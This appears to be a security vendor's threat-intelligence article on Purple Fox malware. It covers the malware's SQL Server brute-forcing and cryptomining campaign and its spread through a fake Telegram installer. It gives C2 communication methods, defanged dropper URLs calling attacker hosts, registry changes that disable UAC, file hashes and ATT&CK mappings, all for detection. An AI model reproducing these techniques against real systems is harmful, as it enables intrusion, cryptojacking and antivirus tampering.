A follow-up article to their previous analysis was produced by Trend Micro on December 13th 2021, this time investigating the use of Purple Fox malware in targeting SQL Servers for cryptocurrency mining purposes. The article also details updated techniques employed by the newer versions of the malware (5. Trend Micro, December 2021).
As with previous versions of Purple Fox, the malware creates a suspended svchost.exe process and uses it to load and execute a payload in the form of a malicious DLL. The process in later versions however is renamed to fontdrvhost.exe by the rootkit driver. As part of its Command and Control (C2) communication, Purple Fox is capable of retrieving additional encrypted DLLs via GET requests and loading them using the injected process. The malware has three distinct ways to communicate with its C2 servers.
The first is Domain Name System (DNS). At the start of each process execution, the malware retrieves a list of C2 IP addresses using DNS. It is important to note that the IP addresses retrieved via DNS during this stage are not the real IP addresses used for the C2 servers but encoded versions of the real IP addresses. The encoded IPs can be decoded by subtracting a fixed number from the IP addresses.
The second communication method is the User Datagram Protocol (UDP), which the malware uses for various types of messages including building a cache of IP addresses that will be used for further communication. This is done by selecting an encoded IP address retrieved by DNS, decoding the IP address and attempting to pull an IP address cache from the selected address. If at any point this fails, the DNS will attempt to pull a new encoded IP address and the process will begin again.
The third communication method used by the malware is Hypertext Transfer Protocol (HTTP). HTTP is used to download additional malware files to the infected system. This is done in the form of a GET request in the following format, where [Filename].moe is a malicious DLL:
hxxp://[IP Address]:[PORT]/[Filename].moe |
These files are then saved and loaded by the injected process which decrypts, decompresses and executes them. Several distinct malware files have been retrieved using the above process. The first is a SQL Server scanner. This file scans local and public IP addresses for SQL Servers running on port 1433. If it discovers the service running on this port it begins a brute-force attack on the SQL Server using a ten million-strong word list.
If the brute force attempt is successful, the malware executes an SQL script which installs a backdoor on the SQL Server. This backdoor allows for the execution of malicious Powershell commands via SQL statements.
The second malware file is a Monero (XMR) Coinminer. Once the file is executed it retrieves its configuration over UDP and executes an embedded XMRig binary in order to join a configured mining pool. It was noted by Trend Micro that the likely reason that SQL Servers have been targeted is due to their more powerful hardware configuration as opposed to regular desktop PCs, which makes coin mining more effective on these systems.
There are several methods of executing commands via SQL, in this case Purple Fox has opted to use CLR Assemblies. CLR Assemblies act as a group of DLLs which can be imported into SQL Servers used to expand the native functionality of SQL Servers; however, they can also facilitate the execution of malicious binaries via SQL (15. Netspi Blog, July 2017).
Type |
Indicator |
Relevance |
Domain Names |
Kew[.]8df[.]us ret[.]6bc[.]Us M[.]tet[.]kozow[.]com a[.]keb[.]kozow[.]com |
Domains used by the DNS requests to retrieve encoded IP addresses. |
IP Address |
178[.]195[.]162[.]94 79[.]222[.]214[.]20 145[.]68[.]65[.]106 73[.]127[.]195[.]228 53[.]238[.]137[.]143 |
Encoded IP addresses. |
108[.]177[.]235[.]90:443 |
XMR Mining Pool IP Address |
ID |
Technique |
Context |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes powershell commands to download a malicious .msi file. |
T1068 |
Exploitation for Privilege Escalation |
Purple Fox uses several exploit modules to exploit various Powershell vulnerabilities and gain administrator privileges. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
T1112 |
Modify Registry |
Purple Fox will check, remove and create registry keys to ensure persistence. |
T1027.002 |
Obfuscated Files or Information: Software Packing |
Purple Fox uses the VMProtect software to pack its rootkit. |
T1014 |
Rootkit |
Purple Fox uses an open source rootkit to hide the files and registry entries it creates. |
T1071.001 |
Application Layer Protocol: Web Protocols |
Purple Fox initiates communication with its C2 servers via Websockets. |
On January 3rd 2022, Minerva reported Purple Fox rootkit distribution through a malicious Telegram messenger installer (11. Minerva Labs, 2022). The initial stage of the attack utilises an AutoIT compiled executable named Telegram Desktop.exe that has an icon that matches the Telegram logo in order to masquerade as a legitimate copy of the messaging software's installer. This fake installer creates a new directory, TextInputh, under C:\Users\Username\AppData\Local\Temp\ and within the folder drops two files: a legitimate Telegram installer and a malicious downloader named TextInputh.exe which is used for the next stage of the attack.
TextInputh.exe is executed, creating a new directory under C:\Users\Public\Videos\ named 1640618495, and contacts a C2 server to retrieve two additional files: 1.rar and 7zz.exe. 1.rar is a malicious archive containing files used in the next stage of the attack while 7zz.exe is a legitimate 7-Zip archive tool used to extract the contents of 1.rar. The 1.rar archive contains the following files:
360.tct, rundll3222.exe and svchost.txt are then copied by TextInput.exe to the ProgramData folder, renaming 360.tct to 360.dll in the process. Following this, ojbk.exe is run with the command line arguments ojbk.exe -a, the archive and the archive tool are deleted, and the process is exited. ojbk.exe is used to reflectively load the malicious 360.dll file with the "-a'' argument, this then reads the content of svchost.txt which contains byte code to execute the next stage of attack.
First, a check is performed by the malware for the presence of 360 AV antivirus software. This is done by searching for the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe\Path.
If the key is found then the malware will drop the following five (5) additional files: Calldriver.exe, Driver.sys, dll.dll, kill.bat, speedmem2.hg.
A detailed analysis of these files was not provided by Minerva, but they are collectively utilised to shut down and disable the initiation of 360 AV and disable Windows User Account Control (UAC) by modifying the following registry keys, setting their values to zero (0):
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop
The malware then retrieves the following information from the infected system:
The malware also checks for active antivirus solutions by searching for a number of antivirus related processes active on the system. All the information gathered is then sent to a hardcoded C2 address. The final stage of the attack consists of the download and deployment of the Purple Fox rootkit described in previous sections.
Type |
Indicator |
Relevance |
MD5 Hashes / File Names |
Telegram Desktop.exe ed1b74827b64fc8913af19b1b745ad1a |
Malware dropper masquerading as a Telegram installer. |
TextInputh.exe c398b504f74500d6a1a47f72bb45bc83 |
Second stage dropper. |
|
WindowsTelegram.exe db1a5b22347216cdeeaeaaea03024a6e |
Legitimate Telegram installer bundled with the malware. |
|
1.rar b947575d0cd7e171bdd38b89b38084da |
Archive containing malware components. |
|
7zz.exe f2ae502d448cfb81a5f40a9368d99b1a |
Legitimate 7-Zip used to extract the 1.rar file. |
|
360.tct/360.dll 96187e12ed4a6f4306516b48634c0926 |
Malware loader |
|
ojbk.exe 50d39beb37c8bec70015a8fd1414b867 |
Executable used to reflectively load the malicious 360.dll file |
|
rundll3222.exe c36bb659f08f046b139c8d1b980bf1ac |
Legitimate rundll executable bundled in the 1.rar file. |
|
svchost.txt 0937955fd23589b0e2124afeec54e916 |
File containing bytecode instructions for executing payload. |
|
Calldriver.exe 963a8b3d307992b6e623ff39e34e6a4c |
Malicious files used to shut down and disable 360 AV and disable UAC. |
|
Driver.sys 7c074b14a54f7b3846e51cfca778f66f |
||
Dll.dll 7c728bdeba5659be53cf9ef243b1902e |
||
kill.bat 24bcbb228662b91c6a7bbbcb7d959e56 |
||
speedmem2.hg 599dbafa6abfaf0d51e15aeb79e93336 |
||
Path |
C:\Users\Username\AppData\Local\Temp\TextInputh |
Directory for files dropped by the malicious Telegram installer. |
C:\Users\Public\Videos\1640618495 |
Directory for files dropped by second stage dropper TextInputh.exe |
|
Registry Path/Key |
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin |
The values of these keys are set to zero (0) by the malware in order to disable UAC |
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA |
||
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop |
||
IP Addresses |
144.48.243[.]79 [Hong Kong] |
Last stage C&C server |
193.164.223[.]77 [Hong Kong] |
Second stage C&C server |
|
Urls |
hxxp://193.164.223[.]77:7456/h?=1640618495 |
Dropper URL for 1.rar file |
hxxp://193.164.223[.]77:7456/77 |
Dropper URL for 7zz.exe file |
|
hxxp://144.48.243[.]79:17674/C558B828.Png |
Dropper URL for Purple Fox Rootkit |
ID |
Technique |
Context |
T1592 |
Gather Victim Host Information |
Malware gathers system information. |
T1036 |
Masquerading |
Malware Masquerading as Telegram Messenger installer. |
T1112 |
Modify Registry |
Disable UAC by setting registry value to 0 |
T1620 |
Reflective Code Loading |
Malware reflectively loads a malicious dll file. |
T1014 |
Rootkit |
Malware drops and installs Purple Fox rootkit. |
T1041 |
Exfiltration Over C2 Channel |
Exfiltrates device information over C2 channel. |
T1489 |
Service Stop |
Malware shuts down and blocks the initiation of AV processes and service. |
Our findings led us to investigate an updated PurpleFox arsenal. Foregenix provide deep knowledge and experience, highly technical analysis and expert threat monitoring and correlation to have one single source of detection and response.
We have developed in-house solutions to detect and mitigate active, advanced and previously unknown threats. Contact us for more support.
Research developed by Foregenix Digital Forensics and Incidents response team members.
See All Articles